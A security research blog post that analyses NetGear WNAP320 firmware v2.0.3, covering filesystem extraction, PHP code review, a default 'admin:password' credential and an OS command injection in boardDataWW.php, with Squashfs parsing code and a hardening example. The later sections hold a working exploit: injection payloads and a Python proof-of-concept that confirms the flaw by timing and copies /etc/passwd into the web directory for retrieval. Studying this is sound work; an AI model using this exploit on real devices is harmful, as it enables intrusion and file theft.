Firmware Analysis on NetGear Access Point WNAP 320
There are a lot of IoT devices connected to the internet today, but most users do not realise that their devices may ship with security vulnerabilities.
Most vendors release patches to fix security vulnerabilities in their IoT devices, but many users never upgrade the firmware, which leaves the device exposed to issues that are already public.
Today we will do some firmware analysis on the NetGear Access Point WNAP320, firmware version 2.0.3.
Download The Firmware From Official Website
To analyze the firmware of the Netgear access point, we can go straight to the official website and download the firmware zip file.
Find firmware v2.0.3 and download it.
Unzip the firmware zip file and we can see that there are 2 files in the archive.
The tar archive is the more interesting one: inside it we find rootfs.squashfs, which is the file that stores the access point's root filesystem.
Analyzing the File System Binary
We start by running binwalk against rootfs.squashfs. binwalk extracts some information about the file and shows that it is a Squashfs filesystem.
Now let's try to extract the filesystem from rootfs.squashfs.
There is a problem when we try to extract it: binwalk reports that sasquatch is not installed, so we need to install it before we can proceed. sasquatch is a patched unsquashfs that understands the vendor-modified Squashfs variants that the stock unsquashfs refuses, which is exactly what embedded firmware tends to use.
The binwalk GitHub page has guidance on how to install sasquatch on our system.
After installing it we are good to go: the filesystem extracts successfully!
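What binwalk does in the signature scan above is look for the Squashfs magic and decode the superblock behind it. The following Python, added here as an illustration and not part of the original post or of binwalk, does the same on a constructed sample image: it scans for the magic variants, reads the version fields (which sit at the same offset in Squashfs 2 through 4), and fully decodes a version 4 superblock. The sample bytes are made up for the example, not taken from the WNAP320 image.

```python
import struct

# Squashfs magic values as they appear on disk. "hsqs"/"sqsh" are the standard
# little/big-endian magics; "shsq"/"qshs" are LZMA-era vendor variants that
# binwalk's signature list also recognises and that stock unsquashfs rejects.
SQUASHFS_MAGICS = {b"hsqs": "<", b"sqsh": ">", b"shsq": "<", b"qshs": ">"}

# Compressor ids used in the version 4 superblock.
COMPRESSORS = {1: "gzip", 2: "lzma", 3: "lzo", 4: "xz", 5: "lz4", 6: "zstd"}

# Version 4 superblock: 5 x u32, 6 x u16, 8 x u64 = 96 bytes.
SB_V4 = "IIIIIHHHHHHQQQQQQQQ"


def find_squashfs(blob):
    """Return sorted (offset, magic) hits, like binwalk's signature scan."""
    hits = []
    for magic in SQUASHFS_MAGICS:
        pos = blob.find(magic)
        while pos != -1:
            hits.append((pos, magic))
            pos = blob.find(magic, pos + 1)
    return sorted(hits)


def parse_superblock(blob, offset):
    """Decode the superblock at offset; pre-4.0 layouts are only identified."""
    magic = blob[offset:offset + 4]
    endian = SQUASHFS_MAGICS[magic]
    major, minor = struct.unpack_from(endian + "HH", blob, offset + 28)
    info = {
        "offset": offset,
        "magic": magic.decode(),
        "endian": "little" if endian == "<" else "big",
        "version": f"{major}.{minor}",
    }
    if major != 4:
        # Older layouts differ field by field; this is the case where
        # sasquatch's patched unsquashfs is needed.
        info["note"] = "pre-4.0 layout, hand it to sasquatch"
        return info
    fields = struct.unpack_from(endian + SB_V4, blob, offset)
    (_, inodes, mkfs_time, block_size, fragments, compressor, block_log,
     flags, no_ids, _, _, root_inode, bytes_used) = fields[:13]
    info.update({
        "inodes": inodes,
        "mkfs_time": mkfs_time,
        "block_size": block_size,
        "block_log": block_log,
        "block_size_consistent": block_size == 1 << block_log,
        "fragments": fragments,
        "compressor": COMPRESSORS.get(compressor, f"unknown({compressor})"),
        "flags": flags,
        "id_count": no_ids,
        "root_inode": root_inode,
        "bytes_used": bytes_used,
    })
    return info


def build_sample_image():
    """Constructed sample: 64 bytes of header padding, then a v4 xz superblock."""
    sb = struct.pack("<" + SB_V4,
                     0x73717368,   # "hsqs" when written little-endian
                     1234, 0, 131072, 10,   # inodes, mkfs_time, block_size, fragments
                     4, 17, 0, 1, 4, 0,     # xz, block_log, flags, id_count, major, minor
                     0, 3_000_000, 0, 0, 0, 0, 0, 0)
    return b"\x00" * 64 + sb + b"\xff" * 32


# Constructed LZMA-variant header claiming version 3.1 (only the version is set).
SAMPLE_LZMA_V3 = b"shsq" + b"\x00" * 24 + struct.pack("<HH", 3, 1)
SAMPLE_IMAGE = build_sample_image()

if __name__ == "__main__":
    for off, _magic in find_squashfs(SAMPLE_IMAGE):
        print(parse_superblock(SAMPLE_IMAGE, off))
    print(parse_superblock(SAMPLE_LZMA_V3, 0))
```

To use it on the real image, read rootfs.squashfs into `blob` and call `find_squashfs`; a compressor id or version that the parser does not decode is a hint that the image needs sasquatch rather than unsquashfs.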
Further Analysis on Squashfs-root Directory
Now let's check out the squashfs-root directory. When we cd into it, we notice that the layout looks like an ordinary Linux filesystem.
Continuing to enumerate the filesystem, we find the web pages of the Netgear access point stored in the home/www directory.
Now let's check each of the .php files for any vulnerability that we can exploit on this access point.
Code Review on login.php
First, we find that the default username is 'admin', based on this line of code.
Then we notice that the password taken from the request parameter 'password' is compared with $str, and the comment next to it says 'password', so we assume that is the default value.
So the default credential we get from the analysis is 'admin:password'.
Code Review on boardDataWW.php
Now we check out another interesting .php file. Notice that line 8 of the code uses exec() to execute system commands.
This line takes the values of the request parameters 'macAddress' and 'reginfo', and the best part is that it does not validate either of them at all. This is bad: the developer should have caught this, because user input must never be trusted, least of all when it is dropped straight into a shell command line.
Based on our experience, an attacker can perform OS command injection by sending '<macaddress>; <system command> #' as the macAddress parameter: the semicolon terminates the original command, the injected command runs next, and the '#' comments out whatever the script appends after the parameter.
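The pattern, and what a fix looks like, in Python rather than PHP (an added example, not the code from boardDataWW.php): the unsafe builder concatenates request values into a shell string exactly as the exec() call does, and a small shell tokeniser shows that the payload above becomes a second command; the hardened builder validates both parameters against a strict format and returns an argv list, so no shell ever parses them. The helper binary name and the 'reginfo' format are placeholders, since the page does not show what the script actually runs.

```python
import re
import shlex

# Hypothetical helper binary standing in for whatever boardDataWW.php invokes.
BOARD_TOOL = "/usr/sbin/boardtool"

# Strict formats. fullmatch() is used below rather than $-anchoring, because
# "$" would still accept a trailing newline and let "\n; cmd" slip through.
MAC_RE = re.compile(r"[0-9A-Fa-f]{2}(:[0-9A-Fa-f]{2}){5}")
REGINFO_RE = re.compile(r"[A-Za-z0-9_-]{1,32}")   # assumed, not from the page


def build_command_unsafe(mac, reginfo):
    """Mirrors the vulnerable pattern: request values pasted into a shell line."""
    return f"{BOARD_TOOL} {mac} {reginfo}"


def shell_commands(cmd):
    """Split a command line into the separate commands a POSIX shell would run.

    Uses shlex with punctuation_chars so ';', '&&', '||', '|' and '&' come back
    as their own tokens; '#' starts a comment, as in the shell (Python >= 3.8).
    """
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for tok in lexer:
        if tok in (";", "&&", "||", "|", "&"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def build_command_safe(mac, reginfo):
    """Hardened form: validate, then return argv for subprocess.run(argv) (no shell)."""
    if not MAC_RE.fullmatch(mac):
        raise ValueError("macAddress is not a MAC address")
    if not REGINFO_RE.fullmatch(reginfo):
        raise ValueError("reginfo contains unexpected characters")
    return [BOARD_TOOL, mac.lower(), reginfo]


def is_accepted(mac, reginfo):
    """True if the hardened builder accepts the pair, False if it rejects it."""
    try:
        build_command_safe(mac, reginfo)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    payload = "00:11:22:33:44:55; sleep 5 #"          # the injection from the post
    print(shell_commands(build_command_unsafe(payload, "0")))
    print(is_accepted(payload, "0"), is_accepted("00:11:22:33:44:55", "0"))
```

Passing the argv list to `subprocess.run` without `shell=True` is the important half of the fix; validation alone still leaves the shell as a parser between the request and the binary.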
Building Environment to Test The Vulnerability
We don't actually need the physical Netgear access point to test the vulnerability. We can use the firmware analysis toolkit to build an emulated environment for us to test in.
First, we need to change the ownership of rootfs.squashfs to root and elevate our own privileges to root.
Then we build the emulated environment for the NetGear Access Point WNAP320 with the firmware analysis toolkit.
Here we can see that the access point's network interface is running on the IP address 192.168.0.100.
Let's check the main page of the access point, and voilà, we have successfully built our virtual Netgear access point.
Time to Exploit!
Now it's time to test our findings. First let's try the default credential 'admin:password' that we found in login.php, and it turns out our finding was correct: that is the default credential!
Now let's check out boardDataWW.php. We found above that this page is vulnerable to OS command injection through the macAddress parameter, so let's try it.
We use Burp Suite to intercept the request.
Now let's send the request to Burp Repeater and test a normal execution first. From the result, we can see that it took 191ms to complete.
Now let's inject a system command that makes the system sleep for 5 seconds.
Payload injected: ;sleep 5 # (the '#' comments out anything the script appends after our parameter)
This time the response took 8,291ms, more than 5 seconds longer than the baseline, which means the delay happened on the access point and we have managed to inject our system command!
Now let's copy /etc/passwd into the script's working directory, which here is the web directory, and name it herepasswd.html so that it can be fetched over HTTP.
Voilà! We managed to retrieve the contents of /etc/passwd.
I've written a PoC script that abuses this vulnerability; you can check it out in my GitHub repo. Click here to go to my Netgear WNAP320 PoC repository.
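The two steps above (timing probe, then file exfiltration) as one script, added here as an example and not the author's PoC from the repository. Standard library only, so it runs against the emulated device without extra packages. Assumptions not confirmed by the page: the device is at 192.168.0.100, boardDataWW.php sits at the web root and takes its parameters by POST, the 'reginfo' value is a dummy, and any session cookie obtained after logging in with admin:password is pasted into `SESSION_COOKIE` (the page does not show the login form's field names, so the login itself is not automated here). The request sender is injected as a callable so the decision logic can be exercised offline with the timings from the post.

```python
import time
import urllib.parse
import urllib.request

TARGET = "http://192.168.0.100"      # emulated AP address from the write-up
VULN_PATH = "/boardDataWW.php"       # assumed to be served from the web root
SESSION_COOKIE = None                # e.g. "SESSIONID=..." copied from Burp (assumed)
SLEEP_SECONDS = 5
BASE_MAC = "00:11:22:33:44:55"       # constructed; any well-formed MAC works


def build_payload(mac, command):
    """'<mac>; <command> #': ';' ends the original command, '#' comments out the rest."""
    return f"{mac}; {command} #"


def post_form(url, fields, timeout=30):
    """One x-www-form-urlencoded POST; returns (status, body, elapsed_ms)."""
    data = urllib.parse.urlencode(fields).encode()
    req = urllib.request.Request(url, data=data)
    if SESSION_COOKIE:
        req.add_header("Cookie", SESSION_COOKIE)
    start = time.monotonic()
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        body = resp.read()
        status = resp.status
    return status, body, (time.monotonic() - start) * 1000


def looks_injected(baseline_ms, probe_ms, sleep_s):
    """Require the delta to be at least the full sleep, so ordinary jitter
    never passes but a slow emulator (8,291ms vs 191ms in the post) does."""
    return probe_ms - baseline_ms >= sleep_s * 1000


def time_based_probe(send, mac=BASE_MAC, sleep_s=SLEEP_SECONDS):
    """Benign request first, then the same request with 'sleep N' injected.

    `send` is a callable fields -> elapsed_ms, so tests can stub the network."""
    baseline_ms = send({"macAddress": mac, "reginfo": "0"})
    probe_ms = send({"macAddress": build_payload(mac, f"sleep {sleep_s}"),
                     "reginfo": "0"})
    return baseline_ms, probe_ms, looks_injected(baseline_ms, probe_ms, sleep_s)


def exfil_request(mac=BASE_MAC, src="/etc/passwd", name="herepasswd.html"):
    """Payload that copies a file into the script's working directory (the web
    directory in the post) and the path to fetch it from afterwards."""
    return build_payload(mac, f"cp {src} {name}"), f"/{name}"


def main():
    url = TARGET + VULN_PATH
    send = lambda fields: post_form(url, fields)[2]
    base, probe, injected = time_based_probe(send)
    print(f"baseline {base:.0f}ms, sleep probe {probe:.0f}ms, injected={injected}")
    if not injected:
        return
    payload, fetch_path = exfil_request()
    post_form(url, {"macAddress": payload, "reginfo": "0"})
    with urllib.request.urlopen(TARGET + fetch_path, timeout=10) as resp:
        print(resp.read().decode(errors="replace"))


if __name__ == "__main__":
    main()
```

The probe deliberately compares against a per-run baseline rather than a fixed threshold: the emulated device is slow and its absolute latency says nothing, only the difference the injected sleep makes does.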
Time for Cleanup
After we have finished testing the Netgear access point firmware, it's time to clean up.
Just press 'ctrl-a x' to exit QEMU.
Then remove the extracted images and created files with reset.py.